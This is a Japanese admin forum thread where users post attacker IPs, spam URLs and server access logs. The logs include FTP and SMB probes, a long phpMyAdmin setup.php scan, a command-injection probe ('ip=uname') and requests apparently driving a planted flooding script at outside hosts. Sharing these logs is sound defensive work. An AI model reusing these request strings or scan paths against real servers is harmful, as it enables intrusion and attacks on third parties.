IP分散SEOの業者だと思うが、IPをランダム変化させながら広告を発射してくるので、iptablesに都度登録するスクリプトいれても 全くもってリソースの無駄。指定したアドレス(削除されたcgi)にアクセスしたIPはDROPするよう自動登録してるが、もう9000件を超えて iptablesに食わせる、こっちのメモリリソースが無駄な気がしてきた。 最近のご丁寧に、リファラも指定して打ち込んでくるようになった。殺すぞwwwwww http://link.iclub.to/0791597/ http://link.iclub.to/0933/ http://link.iclub.to/13571357/ http://link.iclub.to/nasato/ http://link.iclub.to/neko38/ http://link2.iclub.to/0762609/ http://link3.iclub.to/2264770/ http://link3.iclub.to/2889785/ http://link3.iclub.to/36912/ http://link4.iclub.to/kabu/ http://link6.iclub.to/uru80ta/ 113.33.224.197 ftpアタきたんだけど、リモートデスクトップ開放してるが大丈夫なのかこれ 208.51.40.50 ずーとポートスキャンしてきてた このIPアドレスを調べたら中国の新聞(?)サイトらしき所に行き着いたけれど、クラックでもされてるんかな 85.25.131.109 - - [16/Jun/2011:03:21:39 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 404 385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0" 最近、3日おきぐらいにY-ivrrecording.phpへのアクセスしてくるようになった そんなファイル置いてないけど 今こいつが来とる 66.241.100.228 内容は>>61 と同じ 219.135.253.80(80.253.135.219.broad.gz.gd.dynamic.163data.com.cn) 中国から FTPにAdministratorでログインしようとしてた 114.173.176.253 p17253-ipngn100102okayamaima.okayama.ocn.ne.jp 114.174.207.4 p12004-ipngn100105osakakita.osaka.ocn.ne.jp 114.174.253.34 p14034-ipngn100108osakakita.osaka.ocn.ne.jp 114.173.15.191 p12191-ipngn100403kobeminato.hyogo.ocn.ne.jp 114.173.137.79 p18079-ipngn100204niho.hiroshima.ocn.ne.jp 1日20〜30回TCP445への接続を試みてくる そろそろうざい 一日50〜120くらいftpにattackくるな swatchで叩き落としてるが 次スレのスレタイはこうなるの? アタックNo2してきたIPを晒すスレ 適当なところが見つからなかったんで。最近になって、 125.175.54.138 - - [15/Jul/2011:03:32:55 +0900] "GET /you/new.htm HTTP/1.1" 200 55472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑ 125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑ 125.175.54.138 - - [15/Jul/2011:03:35:02 +0900] ↑ 125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑ 125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑ ・・・以下延々と続く・・・ というログが目に付くようになった。ソースIPは日本国内。 アクセス先のURLは正しいURLなんだが、中に張ってある画像へのアクセスはなく、 このページだけ何度もアクセスしてくる。refererもなし。 特徴として、必ず3回ひとまとめでアクセスがあって、 その後100秒〜200秒して次のアクセスがある。 ・・・なんだろう? これ。 31.25.136.18 - - [21/Jun/2011:19:48:48 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 403 1506 193.227.186.153 - - [21/Jun/2011:14:05:16 +0900] "GET /admin/config.php HTTP/1.1" 403 1506 この2つのPHPに最近よくアクセスくるな。 置いてないのに。 JPまたは逆引き出来ないHOSTからは弾いてるんだけど、404返したほうがいいのかな >>80 URLから察するに、何かの更新情報とかを書いてるページ? だとしたらスクレイピング目的のアクセスだと思う 実際どんなページなのかわからんから憶測だけど、たぶん悪意はないと思うよ >>81 その手のはbotだから404返したところで無意味 >>82 更新情報と、あとリンク集のページにも似たようなアクセスがある。 意外に、referer spamばら撒くプログラムが動いてるけど、 セキュリティソフトがreferer止めてるとか・・・。 でもreferer spamはもうちょっと挙動が違うんだよな。 リファラスパムにしては間隔がきっちりしすぎてると思う… 試しにHTMLの構造変えて様子見してみ それでペースが崩れたり人の手でアクセスしてくるような痕跡があるかどうか 68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //scripts/setup.php HTTP/1.1" 404 215 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //admin/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 225 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //db/scripts/setup.php HTTP/1.1" 404 218 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 230 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //web/scripts/setup.php HTTP/1.1" 404 219 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.3.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.4.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.5.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.6.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.8.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.9.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.3/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-2.11.9.4/scripts/setup.php HTTP/1.1" 404 235 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.0.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.3.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 404 228 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //p/m/a/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //PMA2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2006/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2007/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2008/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2009/scripts/setup.php HTTP/1.1" 404 223 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //sqlweb/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webdb/scripts/setup.php HTTP/1.1" 404 221 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admm/scripts/setup.php HTTP/1.1" 404 220 "-" "-" 68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admn/scripts/setup.php HTTP/1.1" 404 220 "-" "-" 歴代PHPMyAdmin探してるっぽい >>93 お前馬鹿かスレタイ100回音読しろ >>85-92 は文字量は多いが アタックのやってきた様子もよくわかる。だから価値アリで問題なし。 ∩___∩ \ヽ | ノ ヽ \ \ヽ / ● ● | ヽ ヽ \ | ( _●_) ミ i l ヽ 彡、 |∪| ノ i l l i / _ ヽノ ) l i | l (___) / / ,,-----、 / / |;:::: ::::| ⊂二(⌒ )二二二|;:::: ::::|⊃ /', ', ¨  ̄ ヽ∴。|;::::',ヾ,::::| /。・,/∴ -:'ヾ|!|!!,i,,!ii,!l,・∵,・、 >>93 外からのアタックではないんだが・・・BINDのスレはあるけど、 DNS全般のスレはなさそうだったので(なくなっちゃった?)。 構内のPCがDNSキャッシュに対して、 ランダム文字列.DHCPの返したドメイン というクエリを3回続けて出してるログが・・・。 1日数回やらかすこともあれば、やらかなさない日もある。 何がトリガになっているのかも分からない。 もちろんNXDOMAINが返るんだが、カミンスキーでもなさそうだし。 今のところ実害はないけど、なんかちょっと気持ち悪い。 何かご存知の方、いらっしゃいます? 202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 202.75.211.206 [2011.8/14-22:06:36 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 202.75.211.206 [2011.8/14-22:06:39 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 202.75.211.206 [2011.8/14-22:06:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-" 79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-" 79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-" 79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-" 79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-" 